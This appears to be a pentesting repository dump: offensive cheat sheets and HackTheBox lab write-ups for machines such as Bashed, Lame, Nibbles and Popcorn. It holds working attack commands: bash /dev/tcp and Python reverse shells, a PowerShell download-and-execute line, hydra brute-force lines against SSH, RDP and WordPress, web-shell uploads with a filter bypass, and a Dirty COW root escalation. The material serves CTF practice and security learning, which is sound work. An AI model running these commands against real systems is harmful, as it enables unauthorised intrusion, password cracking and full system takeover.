12 | # get linux OS info 13 | - https://www.cyberciti.biz/faq/how-to-check-os-version-in-linux-command-line/ 14 | ```console 15 | $ cat /etc/*release 16 | $ uname -a 17 | ``` 18 | 19 | # TTY shell 20 | ```console 21 | $ python -c 'import pty; pty.spawn("/bin/bash")' 22 | $ python3 -c 'import pty; pty.spawn("/bin/sh")' 23 | $ echo os.system('/bin/bash') 24 | $ /bin/sh -i 25 | ``` 26 | now `^z` (background) it 27 | ``` 28 | stty raw -echo;fg 29 | export TERM=xterm 30 | ``` 31 | auto tab is good to go! 32 | # Linux capacity 33 | ```console 34 | $ getcap -r / 2>/dev/null 35 | ``` 36 | # cronjob 37 | ```console 38 | $ for i in d hourly daily weekly monthly; do echo; echo "--cron.$i--"; ls -l /etc/cron.$i; done 39 | ``` 40 | 41 | # echo "#!/bin/bash" 42 | ```console 43 | $ set +H 44 | $ echo "#!/bin/bash" > shell.sh 45 | ``` 46 | 47 | # enum4linux 48 | @ `/usr/share/enum4linux/enum4linux.pl` by default 49 | - samba/smb 50 | ```console 51 | /usr/share/enum4linux/enum4linux.pl -U 10.10.223.29 # user 52 | /usr/share/enum4linux/enum4linux.pl -S 10.10.223.29 # sharelist 53 | ``` -------------------------------------------------------------------------------- /CheatSheet/etc.md: -------------------------------------------------------------------------------- 1 | ## tty shell 2 | ```console 3 | $ python3 -c "import pty; pty.spawn('/bin/bash')" 4 | www-data@startup:/$ ^Z 5 | zsh: suspended nc -nlvp 6969 6 | 7 | ┌──(kali㉿kali)-[~/THM/startup] 8 | └─$ stty raw -echo;fg 148 ⨯ 1 ⚙ 9 | [1] + continued nc -nlvp 6969 10 | # enter to go back to nc sesstion 11 | www-data@startup:/$ export TERM=xterm # auto tab 12 | 13 | ``` 14 | ## SSH "Konami Code" (SSH Control Sequences) 15 | link [here](https://www.sans.org/blog/using-the-ssh-konami-code-ssh-control-sequences/) 16 | 17 | ## SUID 18 | use **suid3num.py** 19 | ```console 20 | $ find / -user root -perm -4000 -exec ls -ldb {} \; 2> /dev/null # scan the whole file system to find all files with the SUID bit set that is own by root 21 | $ find / -perm -4000 -exec ls -ldb {} \; 2>/dev/null 22 | $ find / -perm -u=s -type f 2>/dev/null 23 | $ find / -perm -4000 -exec ls -ldb {} \; 2> /dev/null # same as about but own by any user 24 | $ find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null # both SUID and SUIG 25 | ``` 26 | ## nmap 27 | ```console 28 | $ nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse $IP #smb 29 | $ nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount $IP # rpcbind 30 | ``` 31 | ## powershell 32 | ``` 33 | powershell -command "IEX (New-Object System.Net.WebClient).Downloadfile('http://:/shell2.exe','shell2.exe')" 34 | powershell -c "Invoke-WebRequest -Uri 'web' -OutFile 'out'" 35 | ``` 36 | 37 | ### hydra 38 | credit noxtal cheatsheet, check [here](https://noxtal.com/cheatsheets/2020/07/24/hydra-cheatsheet/) 39 | ```console 40 | $ hydra -f -l user -P /usr/share/wordlists/rockyou.txt $IP -t 64 ssh 41 | $ hydra -f -t 64 -l user -P /usr/share/wordlists/rockyou.txt $IP mysql 42 | $ hydra -f -t 64 -l user -P /usr/share/wordlists/rockyou.txt $IP ftp 43 | $ hydra -f -t 64 -l user -P /usr/share/wordlists/rockyou.txt $IP smb 44 | $ hydra -t 64 -l user -P /usr/share/wordlists/rockyou.txt $IP http-post-form "/login.php:username=^USER^&password=^PASS^:Login Failed" 45 | $ hydra -f -t 64 -l user -P /usr/share/wordlists/rockyou.txt $IP -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location' #wordpress 46 | $ hydra -f -t 64 -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$IP 47 | $ hydra -t 64 -l username -P /usr/share/wordlists/rockyou.txt pop3://$IP #pop3 48 | $ hydra -L users.txt -P pass.txt telnet://target.server # telnet 49 | ``` 50 | ## Reverse SSH port forwarding 51 | ```console 52 | $ ssh -L :: @$IP 53 | ``` 54 | ## python revs shell 55 | ```py 56 | import socket 57 | import pty 58 | s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) 59 | s.connect(("kali ip",9696)) 60 | dup2(s.fileno(),0) 61 | dup2(s.fileno(),1) 62 | dup2(s.fileno(),2) 63 | pty.spawn("/bin/bash") 64 | ``` 65 | 66 | 67 | ## curl 68 | ```console 69 | kali@kali:~$ curl http://10.10.10.204:8081/ctf/get 70 | thm{162520bec925bd7979e9ae65a725f99f}kali@kali:~$ ^C 71 | kali@kali:~$ curl -d 'flag_please' http://10.10.10.204:8081/ctf/post 72 | thm{3517c902e22def9c6e09b99a9040ba09}kali@kali:~$ ^C 73 | kali@kali:~$ curl http://10.10.10.204:8081/ctf/getcookie 74 | Check your cookies!kali@kali:~$ curl http://10.10.10.204:8081/ctf/getcookie -i 75 | HTTP/1.1 200 OK 76 | Set-Cookie: flag=thm{91b1ac2606f36b935f465558213d7ebd}; Path=/ 77 | Date: Fri, 17 Jul 2020 12:44:02 GMT 78 | Content-Length: 19 79 | Content-Type: text/plain; charset=utf-8 80 | 81 | Check your cookies! 82 | kali@kali:~$ curl http://10.10.10.204:8081/ctf/sendcookie -i --cookie flagpls=flagpls 83 | HTTP/1.1 200 OK 84 | Date: Fri, 17 Jul 2020 12:46:55 GMT 85 | Content-Length: 37 86 | Content-Type: text/plain; charset=utf-8 87 | 88 | thm{c10b5cb7546f359d19c747db2d0f47b3} 89 | ``` 90 | 91 | 92 | 93 | #### impacket 94 | ```shell 95 | # check ASREPRoast for all domain users (credentials required) 96 | python GetNPUsers.py /: -request -format -outputfile 97 | 98 | # check ASREPRoast for a list of users (no credentials required) 99 | python GetNPUsers.py / -usersfile -format -outputfile 100 | ``` 101 | 102 | 103 | 104 | ## etc 105 | ```console 106 | $ usermod -aG sudo [user] # adds a user to the Sudo Group on Linux: 107 | ``` -------------------------------------------------------------------------------- /CheatSheet/kali-setup.md: -------------------------------------------------------------------------------- 1 | # todo: 2 | - [ ] https://github.com/DominicBreuker/pspy 3 | # general 4 | ```console 5 | kali@kali:~$ sudo apt-get install -y gobuster 6 | kali@kali:~$ sudo apt-get install -y python3-pip 7 | kali@kali:~$ sudo apt-get install -y openvpn 8 | kali@kali:~$ sudo apt-get install -y seclists # seclist wordlist!! 9 | kali@kali:/opt$ sudo wget https://raw.githubusercontent.com/Anon-Exploiter/SUID3NUM/master/suid3num.py 10 | kali@kali:~$ sudo apt-get install -y golang # go 11 | kali@kali:~$ sudo apt-get install -y steghide 12 | kali@kali:~$ sudo apt-get install -y remmina # rdp tool 13 | kali@kali:~$ sudo apt-get install -y evolution # email client app 14 | ``` 15 | or 16 | ```console 17 | kali@kali:~$ sudo apt-get install -y gobuster python3-pip openvpn seclists golang steghide steghide remmina 18 | ``` 19 | # terminator 20 | - [unlimited-scroll](https://askubuntu.com/questions/618464/unlimited-scroll-in-terminator) 21 | ```console 22 | $ sudo apt-get install terminator 23 | $ nano terminator/config # Open the terminator config file 24 | ``` 25 | under the `[profiles]` entry add those lines 26 | ``` 27 | [[default]] 28 | scrollback_infinite = True 29 | ``` 30 | Now save and exit then restart your terminator. enjoy 31 | 32 | # pymap 33 | ```console 34 | kali@kali:/opt$ sudo wget https://raw.githubusercontent.com/gu2rks/pymap/master/pymap.py 35 | kali@kali:/opt$ sudo chmod +x pymap.py 36 | ``` 37 | # impacket 38 | ```console 39 | $ sudo git clone https://github.com/SecureAuthCorp/impacket.git 40 | $ cd impacket && pip3 install -r requirements.txt 41 | $ sudo python3 setup.py install 42 | ``` 43 | # privilege-escalation-awesome-scripts-suite 44 | ```console 45 | $ sudo git clone https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite.git 46 | $ sudo mkdir privesc 47 | kali@kali:/opt$ sudo cp privilege-escalation-awesome-scripts-suite/winPEAS/winPEASexe/winPEAS/obj/x64/Release/winPEAS.exe privesc/winPEAS-x64.exe 48 | kali@kali:/opt$ sudo cp privilege-escalation-awesome-scripts-suite/winPEAS/winPEASexe/winPEAS/obj/x86/Release/winPEAS.exe privesc/winPEAS-x86.exe 49 | kali@kali:/opt$ sudo cp privilege-escalation-awesome-scripts-suite/winPEAS/winPEASbat/winPEAS.bat privesc/ 50 | kali@kali:/opt$ sudo cp privilege-escalation-awesome-scripts-suite/linPEAS/linpeas.sh privesc/ 51 | ``` 52 | 53 | # Sipvicious 54 | - https://github.com/EnableSecurity/sipvicious 55 | ```console 56 | $ sudo pip3 install sipvicious 57 | ``` 58 | 59 | # Empire 60 | ```console 61 | $ cd /opt 62 | $ git clone https://github.com/BC-SECURITY/Empire.git 63 | $ cd Empire 64 | $ sudo ./setup/install.sh 65 | ``` 66 | 67 | # Starkiller 68 | - Empire is requried 69 | ## Installing 70 | ```console 71 | $ cd /opt 72 | $ # Download an up to date version of starkiller from the BC-Security Github repo - https://github.com/BC-SECURITY/Starkiller/releases 73 | $ chmod +x starkiller-1.X.X.AppImage 74 | $ sudo ./starkiller-1.X.X.AppImage --no-sandbox 75 | ``` 76 | ## Setting Up Starkiller 77 | ```console 78 | $ cd /opt/Empire 79 | $ sudo ./empire --rest # on 1st terminal run empire 80 | $ sudo ./starkiller-1.X.X.AppImage --no-sandbox # 2nd run starkiller! 81 | ``` 82 | Default Credentials: 83 | - uri: 127.0.0.1:1337 84 | - user: empireadmin 85 | - pass: password123 86 | -------------------------------------------------------------------------------- /HackTheBox/EZ/bashed.md: -------------------------------------------------------------------------------- 1 | # recon 2 | - OS: linux TTL 63 3 | - Apache/2.4.18 (Ubuntu) Server at bashed.htb Port 80 4 | 5 | - gobuster 6 | ``` 7 | /about.html (Status: 200) 8 | /config.php (Status: 200) 9 | /contact.html (Status: 200) 10 | /css (Status: 301) 11 | /dev (Status: 301) 12 | /fonts (Status: 301) 13 | /images (Status: 301) 14 | /index.html (Status: 200) 15 | /js (Status: 301) 16 | /php (Status: 301) 17 | /scroll.html (Status: 200) 18 | /server-status (Status: 403) 19 | /single.html (Status: 200) 20 | /uploads (Status: 301) 21 | ``` 22 | I try to visite `/uploads/phpbash.php` and hope to get a web shell since one of the picture show that directory but Unfortunately. 23 | 24 | Anywat after some tries, I found web shell at `/dev` which `www-data` priv I did like the shell that much so I decided to upload `php-reverse-shell.php` (installed by defualt on ur kali) on `/uploads` and gain reverse shell instead. 25 | 26 | # foot hold 27 | grab user flag and more recon 28 | ``` 29 | www-data@bashed:/$ python -c 'import pty; pty.spawn("/bin/bash")' 30 | python -c 'import pty; pty.spawn("/bin/bash")' 31 | www-data@bashed:/$ sudo -l 32 | sudo -l 33 | Matching Defaults entries for www-data on bashed: 34 | env_reset, mail_badpass, 35 | secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin 36 | 37 | User www-data may run the following commands on bashed: 38 | (scriptmanager : scriptmanager) NOPASSWD: ALL 39 | ``` 40 | so let priv esc to scriptmanager 41 | ``` 42 | www-data@bashed:/var/www/html/uploads$ sudo -u scriptmanager bash -i 43 | ``` 44 | 45 | 46 | # root 47 | ``` 48 | scriptmanager@bashed:/$ find / -user scriptmanager 2> /dev/null 49 | find / -user scriptmanager 2> /dev/null 50 | /scripts 51 | . 52 | . 53 | ``` 54 | oh we own /scripts let go check 55 | ``` 56 | scriptmanager@bashed:~$ ls -ls /scripts 57 | ls -ls /scripts 58 | total 12 59 | 4 -rw-r--r-- 1 scriptmanager scriptmanager 214 Sep 22 12:17 test.py 60 | 4 -rw-r--r-- 1 root root 18 Sep 21 15:03 test.txt 61 | ``` 62 | if you keep `ls -la` you will notice that the file modify time change each min. The plan is put a python reverse shell script. 63 | 64 | you can also make sure about the automate jobs by a tool call `pspy` if you run the tool you will se that 65 | ``` 66 | 2020/09/22 13:15:38 CMD: UID=0 PID=15974 | python test.py 67 | ``` 68 | this show us the uid=0 which is root is executing `python test.py`. I also try to create a dummy test2.py and keep monitoring `pspy`. The result show that root user excute any `.py` in `/scripts` directory. 69 | 70 | 71 | Since nano dosnt works I decided to create python reverse shell on my kali and use wget to get it to `/script`. Now open netcat and listen to the given port. **BOOM!** 72 | ``` 73 | root@bashed:/scripts# ls 74 | ``` 75 | -------------------------------------------------------------------------------- /HackTheBox/EZ/blue.md: -------------------------------------------------------------------------------- 1 | # recon 2 | - port + service 3 | ``` 4 | PORT STATE SERVICE VERSION 5 | 135/tcp open msrpc Microsoft Windows RPC 6 | |_clamav-exec: ERROR: Script execution failed (use -d to debug) 7 | 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 8 | |_clamav-exec: ERROR: Script execution failed (use -d to debug) 9 | 445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP) 10 | |_clamav-exec: ERROR: Script execution failed (use -d to debug) 11 | 49152/tcp open msrpc Microsoft Windows RPC 12 | |_clamav-exec: ERROR: Script execution failed (use -d to debug) 13 | 49153/tcp open msrpc Microsoft Windows RPC 14 | |_clamav-exec: ERROR: Script execution failed (use -d to debug) 15 | 49154/tcp open msrpc Microsoft Windows RPC 16 | |_clamav-exec: ERROR: Script execution failed (use -d to debug) 17 | 49155/tcp open msrpc Microsoft Windows RPC 18 | |_clamav-exec: ERROR: Script execution failed (use -d to debug) 19 | 49156/tcp open msrpc Microsoft Windows RPC 20 | |_clamav-exec: ERROR: Script execution failed (use -d to debug) 21 | 49157/tcp open msrpc Microsoft Windows RPC 22 | |_clamav-exec: ERROR: Script execution failed (use -d to debug) 23 | ``` 24 | - nmap vuln script 25 | ``` 26 | Host script results: 27 | |_smb-vuln-ms10-054: false 28 | |_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND 29 | | smb-vuln-ms17-010: 30 | | VULNERABLE: 31 | | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) 32 | | State: VULNERABLE 33 | | IDs: CVE:CVE-2017-0143 34 | | Risk factor: HIGH 35 | | A critical remote code execution vulnerability exists in Microsoft SMBv1 36 | | servers (ms17-010). 37 | | 38 | | Disclosure date: 2017-03-14 39 | | References: 40 | | https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/ 41 | | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143 42 | |_ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx 43 | ``` 44 | - msf5 scanner/smb/smb_version 45 | ``` 46 | msf5 auxiliary(scanner/smb/smb_version) > run 47 | 48 | [+] 10.10.10.40:445 - Host is running Windows 7 Professional SP1 (build:7601) (name:HARIS-PC) (signatures:optional) 49 | ``` 50 | nmap -p445 --script smb-check-vulns.nse 51 | 52 | # foot hold/root 53 | ## with metaslpoit 54 | - `windows/smb/ms17_010_eternalblue` 55 | ``` 56 | meterpreter > load powershell 57 | Loading extension powershell...Success. 58 | meterpreter > powershell_execute whoami 59 | [+] Command execution completed: 60 | nt authority\system 61 | ``` 62 | - cat Administrator/Desktop/root.txt 63 | ## without metasploit 64 | - https://ethicalhackingguru.com/how-to-exploit-ms17-010-eternal-blue-without-metasploit/ -------------------------------------------------------------------------------- /HackTheBox/EZ/lame.md: -------------------------------------------------------------------------------- 1 | # recon 2 | - ports 3 | ``` 4 | 21/tcp open ftp 5 | 22/tcp open ssh 6 | 139/tcp open netbios-ssn 7 | 445/tcp open microsoft-ds 8 | 3632/tcp open distccd 9 | ``` 10 | - details 11 | ``` 12 | 21/tcp open ftp vsftpd 2.3.4 13 | |_ftp-anon: Anonymous FTP login allowed (FTP code 230) 14 | | ftp-syst: 15 | | STAT: 16 | | FTP server status: 17 | | Connected to 10.10.14.12 18 | | Logged in as ftp 19 | | TYPE: ASCII 20 | | No session bandwidth limit 21 | | Session timeout in seconds is 300 22 | | Control connection is plain text 23 | | Data connections will be plain text 24 | | vsFTPd 2.3.4 - secure, fast, stable 25 | |_End of status 26 | 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) 27 | | ssh-hostkey: 28 | | 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA) 29 | |_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA) 30 | 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 31 | 445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP) 32 | 3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4)) 33 | ``` 34 | - ftp: 35 | - vsftpd 2.3.4 36 | - empty with `ls -la` 37 | ``` 38 | ftp> put test.txt 39 | local: test.txt remote: test.txt 40 | 200 PORT command successful. Consider using PASV. 41 | 553 Could not create file. 42 | ``` 43 | - smb: 44 | - Samba smbd 3.0.20-Debian 45 | - [CVE-2007-2447](https://www.rapid7.com/db/modules/exploit/multi/samba/usermap_script) 46 | ``` 47 | | smb-enum-shares: 48 | | account_used: 49 | | \\10.10.10.3\ADMIN$: 50 | | Type: STYPE_IPC 51 | | Comment: IPC Service (lame server (Samba 3.0.20-Debian)) 52 | | Users: 1 53 | | Max Users: 54 | | Path: C:\tmp 55 | | Anonymous access: 56 | | \\10.10.10.3\IPC$: 57 | | Type: STYPE_IPC 58 | | Comment: IPC Service (lame server (Samba 3.0.20-Debian)) 59 | | Users: 1 60 | | Max Users: 61 | | Path: C:\tmp 62 | | Anonymous access: READ/WRITE 63 | | \\10.10.10.3\opt: 64 | | Type: STYPE_DISKTREE 65 | | Comment: 66 | | Users: 1 67 | | Max Users: 68 | | Path: C:\tmp 69 | | Anonymous access: 70 | | \\10.10.10.3\print$: 71 | | Type: STYPE_DISKTREE 72 | | Comment: Printer Drivers 73 | | Users: 1 74 | | Max Users: 75 | | Path: C:\var\lib\samba\printers 76 | | Anonymous access: 77 | | \\10.10.10.3\tmp: 78 | | Type: STYPE_DISKTREE 79 | | Comment: oh noes! 80 | | Users: 1 81 | | Max Users: 82 | | Path: C:\tmp 83 | |_ Anonymous access: READ/WRITE 84 | ``` 85 | - distccd v1 86 | - [CVE-2004-2687](https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855) 87 | 88 | 89 | # foot hold. 90 | should ur path, there is 3 exloit that you can use. if you aim for oscp, dont use metasploit if you dont have too. I choosen to use `CVE-2004-2687` to get foothold. I try to use suid to priv esc to gain root but it did work... 91 | ``` 92 | [#] SUID Binaries in GTFO bins list (Hell Yeah!) 93 | ------------------------------ 94 | /usr/bin/nmap -~> https://gtfobins.github.io/gtfobins/nmap/#suid 95 | ------------------------------ 96 | 97 | 98 | [&] Manual Exploitation (Binaries which create files on the system) 99 | ------------------------------ 100 | [&] Nmap ( /usr/bin/nmap ) 101 | TF=$(mktemp) 102 | echo 'os.execute("/bin/sh")' > $TF 103 | /usr/bin/nmap --script=$TF 104 | 105 | ------------------------------ 106 | ``` 107 | just dump 108 | ```bash 109 | bash -i >& /dev/tcp/10.10.14.12/6969 0>&1 110 | ``` 111 | ## root 112 | so suid didnt works, I took one step backward and go thru recon's result. I then choose to use `CVE-2007-2447` to gain root access using this script on github https://github.com/amriunix/CVE-2007-2447. it is straight forward, `wget` the exploit and `pip` all requriment. `readme.md` explain how to use the script clearly 113 | 114 | ``` 115 | kali@kali:~/script$nc -nlvp 6969h 116 | listening on [any] 6969 ... 117 | connect to [10.10.14.12] from (UNKNOWN) [10.10.10.3] 52344 118 | whoami 119 | root 120 | ``` -------------------------------------------------------------------------------- /HackTheBox/EZ/legacy.md: -------------------------------------------------------------------------------- 1 | # recon 2 | - port + version 3 | ``` 4 | 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 5 | 445/tcp open microsoft-ds Windows XP microsoft-ds 6 | 3389/tcp closed ms-wbt-server 7 | ``` 8 | - OS: Windows XP (Windows 2000 LAN Manager) 9 | - 445 microsoft-ds Windows XP microsoft-ds 10 | - [MS08-067](https://www.rapid7.com/db/modules/exploit/windows/smb/ms08_067_netapi) 11 | - [CVE-2008-4250](https://nvd.nist.gov/vuln/detail/CVE-2008-4250) 12 | - python exploit 13 | - https://github.com/jivoi/pentest/blob/master/exploit_win/ms08-067.py 14 | - https://github.com/andyacer/ms08_067 15 | - [how to](https://ivanitlearning.wordpress.com/2019/03/03/ms08-067-exploitation-pass-the-hash-without-metasploit/) 16 | 17 | ``` 18 | msf5 auxiliary(scanner/smb/smb_version) > run 19 | 20 | [+] 10.10.10.4:445 - Host is running Windows XP SP3 (language:English) (name:LEGACY) (workgroup:HTB ) (signatures:optional) 21 | ``` 22 | 23 | # foot hold + root 24 | - use `exploit/windows/smb/ms08_067_netapi`. set rhost, lhost and run. 25 | - to get root: meterpreter getsystem. 26 | -------------------------------------------------------------------------------- /HackTheBox/EZ/nibbles.md: -------------------------------------------------------------------------------- 1 | # recon 2 | - 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) 3 | - 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) 4 | 5 | found a hidden text in index.html, which lead us to `nibbles.htb/nibbleblog/` 6 | 7 | now gobuster!!! 8 | ``` 9 | /README 10 | /admin (Status: 301) 11 | /content (Status: 301) 12 | /languages (Status: 301) 13 | /plugins (Status: 301) 14 | /themes (Status: 301) 15 | ``` 16 | 17 | - /nibbleblog/README 18 | ``` 19 | ====== Nibbleblog ====== 20 | Version: v4.0.3 21 | Codename: Coffee 22 | Release date: 2014-04-01 23 | ``` 24 | - /nibbleblog/admin.php is a login page. guess and luckly got in with `admin:nibbles` 25 | 26 | some digging and found this link from [wikihack](https://wikihak.com/how-to-upload-a-shell-in-nibbleblog-4-0-3/) 27 | 28 | okey let find our shell on kali 29 | ```console 30 | kali@kali:/opt$ sudo find / -name php-reverse* 2> /dev/null 31 | /usr/share/webshells/php/php-reverse-shell.php 32 | ``` 33 | copy it and modify ip and port 34 | 1. upload shell as the guide said 35 | 2. nc listen for incoming reverse shell 36 | 3. vistie nibbles.htb/nibbleblog/content/private/plugins/my_image/my_image.php 37 | 38 | BOOM ! go grab the flag 39 | 40 | there is a zip file call personal.zip. I found a .sh call monitor.sh that looks interesting 41 | 42 | ```console 43 | nibbler@Nibbles:/home/nibbler/personal/stuff$ ls -la 44 | ls -la 45 | total 12 46 | drwxr-xr-x 2 nibbler nibbler 4096 Dec 10 2017 . 47 | drwxr-xr-x 3 nibbler nibbler 4096 Dec 10 2017 .. 48 | -rwxrwxrwx 1 nibbler nibbler 4015 May 8 2015 monitor.sh 49 | ``` 50 | I googling a bit about **tecmint monitor** but didnt find anything juicy about the script 51 | 52 | 53 | Escape jail shell by runing `python3 -c 'import pty; pty.spawn("/bin/bash")'` 54 | now let check.. 55 | 56 | - sudo -l 57 | ```console 58 | sudo: unable to resolve host Nibbles: Connection timed out 59 | Matching Defaults entries for nibbler on Nibbles: 60 | env_reset, mail_badpass, 61 | secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin 62 | 63 | User nibbler may run the following commands on Nibbles: 64 | (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh 65 | ``` 66 | since I cant use `vi` or `nano` I decided to create the monitor.sh on my kali and run python webserver then wget it on the victim server. here is the content of `monitor.sh` 67 | ```console 68 | kali@kali:~/HTB/nibbles$ cat monitor.sh 69 | #!/bin/sh 70 | /bin/bash -i 71 | ``` 72 | now remove the old .sh and wget the one we created on kali 73 | ```console 74 | nibbler@Nibbles:/home/nibbler/personal/stuff$ rm monitor.sh #remove the old one that i uzip it 75 | nibbler@Nibbles:/home/nibbler/personal/stuff$ wget http://10.10.14.8:8888/monitor.sh 76 | ] 23 --.-KB/s in 0s 84 | 85 | 2020-10-02 15:00:51 (2.39 MB/s) - 'monitor.sh.1' saved [23/23] 86 | ``` 87 | now let get root shell! 88 | ``` 89 | nibbler@Nibbles:/home/nibbler/personal/stuff$ chmod +x monitor.sh 90 | chmod +x monitor.sh 91 | nibbler@Nibbles:/home/nibbler/personal/stuff$ ls -la 92 | ls -la 93 | total 24 94 | drwxr-xr-x 2 nibbler nibbler 4096 Oct 2 15:02 . 95 | drwxr-xr-x 3 nibbler nibbler 4096 Dec 10 2017 .. 96 | -rw-r--r-- 1 nibbler nibbler 12288 Oct 2 14:50 .monitor.sh.swp 97 | -rwxrwxrwx 1 nibbler nibbler 23 Oct 2 14:56 monitor.sh 98 | nibbler@Nibbles:/home/nibbler/personal/stuff$ cd .. 99 | nibbler@Nibbles:/home/nibbler/personal$ sudo stuff/monitor.sh 100 | sudo stuff/monitor.sh 101 | sudo: unable to resolve host Nibbles: Connection timed out 102 | root@Nibbles:/home/nibbler/personal/stuff# whoami 103 | whoami 104 | root 105 | ``` 106 | Now go grab root flag 107 | 108 | ps: I keep getting this message `sudo: unable to resolve host Nibbles: Connection timed out` 1st time when i run `sudo -l` now again after googling around I found a solution which is add host name to /etc/hosts: `echo "127.0.1.2 Nibbles" >> /etc/hosts` 109 | -------------------------------------------------------------------------------- /HackTheBox/EZ/popcorn.md: -------------------------------------------------------------------------------- 1 | # recon 2 | - 22/tcp open ssh OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0) 3 | - 80/tcp open http Apache httpd 2.2.12 ((Ubuntu)) 4 | 5 | ## gobuster 6 | - /cgi-bin/ (Status: 403) -> forbiden 7 | - /index (Status: 200) 8 | - /rename (Status: 301) `index.php?filename=old_file_path_an_name&newfilename=new_file_path_and_name` 9 | - /test (Status: 200) -> phpinfo() 10 | - /torrent (Status: 301) -> Torrent hoster 11 | 12 | ### Torrent hoster 13 | ``` 14 | /admin (Status: 301) 15 | /.htpasswd (Status: 403) 16 | /browse (Status: 200) 17 | /comment (Status: 200) 18 | /config (Status: 200) 19 | /css (Status: 301) 20 | /database (Status: 301) 21 | /download (Status: 200) 22 | /edit (Status: 200) 23 | /health (Status: 301) 24 | /hide (Status: 200) 25 | /images (Status: 301) 26 | /index (Status: 200) 27 | /js (Status: 301) 28 | /lib (Status: 301) 29 | /login (Status: 200) 30 | /logout (Status: 200) 31 | /preview (Status: 200) 32 | /readme (Status: 301) 33 | /rss (Status: 200) 34 | /secure (Status: 200) 35 | /stylesheet (Status: 200) 36 | /templates (Status: 301) 37 | /thumbnail (Status: 200) 38 | /torrents (Status: 301) 39 | /upload (Status: 301) 40 | /upload_file (Status: 200) 41 | /users (Status: 301) 42 | /validator (Status: 200) 43 | ``` 44 | Always using happy path to understand the application. I notice that I can upload a picture on the server after I publish a torrent on the application. I uploaded a picture of cute cat, the picture is then save in `/torrent/upload/` 45 | 46 | 47 | so we can try to upload a malicious php as a picture and visti `/torrent/upload/` to execute the file.... It didnt works. so I ran `burp` to intercept the request and check it out. 48 | ``` 49 | Content-Disposition: form-data; name="file"; filename="cutiecat.php.png" 50 | Content-Type: image/png 51 | ``` 52 | I changed `filename="cutiecat.php.png"` to `filename="cutiecat.php"` now check. the page `/torrent/upload/` and check if our reveseshell got upload and BOOM it is there. now view our .php to get a reverse shell!! 53 | ``` 54 | [10.10.14.43]-kali@kali:~/HTB/popcorn$ nc -nlvp 6969 55 | listening on [any] 6969 ... 56 | connect to [10.10.14.43] from (UNKNOWN) [10.10.10.6] 51870 57 | Linux popcorn 2.6.31-14-generic-pae #48-Ubuntu SMP Fri Oct 16 15:22:42 UTC 2009 i686 GNU/Linux 58 | 17:36:03 up 13:22, 0 users, load average: 0.00, 0.00, 0.00 59 | USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT 60 | uid=33(www-data) gid=33(www-data) groups=33(www-data) 61 | /bin/sh: can't access tty; job control turned off 62 | $ python -c "import pty; pty.spawn('/bin/bash')" 63 | www-data@popcorn:/$ ls -la /home 64 | ls -la /home 65 | total 12 66 | drwxr-xr-x 3 root root 4096 Mar 17 2017 . 67 | drwxr-xr-x 21 root root 4096 Oct 31 04:13 .. 68 | drwxr-xr-x 3 george george 4096 Oct 26 19:35 george 69 | www-data@popcorn:/home/george$ ls -l 70 | ls -l 71 | total 836 72 | -rw-r--r-- 1 george george 848727 Mar 17 2017 torrenthoster.zip 73 | -rw-r--r-- 1 george george 33 Oct 31 04:14 user.txt 74 | ``` 75 | nice we have permission to `r` on `george` directory, grab user flag and let recon to gain root. 76 | # root 77 | linpeas.sh dont gave much info, we found some password for database and we know that the kernel is old. I also find `motd`. I tried to exploit popcorn with motd but it didnt work. `dos2unix 14339.sh` didn't help either. when I excecute the exploit it asked me for www-data password which I do not have... So I go for kernel exploitation instead, dirty cow! 78 | ```console 79 | www-data@popcorn:/tmp$ gcc -pthread dirty.c -o dirty -lcrypt 80 | gcc -pthread dirty.c -o dirty -lcrypt 81 | www-data@popcorn:/tmp$ chmod +x dirty 82 | chmod +x dirty 83 | www-data@popcorn:/tmp$ ./dirty 84 | ./dirty 85 | /etc/passwd successfully backed up to /tmp/passwd.bak 86 | Please enter the new password: 87 | 88 | Complete line: 89 | firefart:figsoZwws4Zu6:0:0:pwned:/root:/bin/bash 90 | 91 | mmap: b7879000 92 | ^C 93 | [10.10.14.43]-kali@kali:~/HTB/popcorn$ nc -nlvp 6969 94 | listening on [any] 6969 ... 95 | connect to [10.10.14.43] from (UNKNOWN) [10.10.10.6] 38532 96 | Linux popcorn 2.6.31-14-generic-pae #48-Ubuntu SMP Fri Oct 16 15:22:42 UTC 2009 i686 GNU/Linux 97 | 19:06:29 up 40 min, 0 users, load average: 1.79, 1.26, 0.86 98 | USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT 99 | uid=33(www-data) gid=33(www-data) groups=33(www-data) 100 | 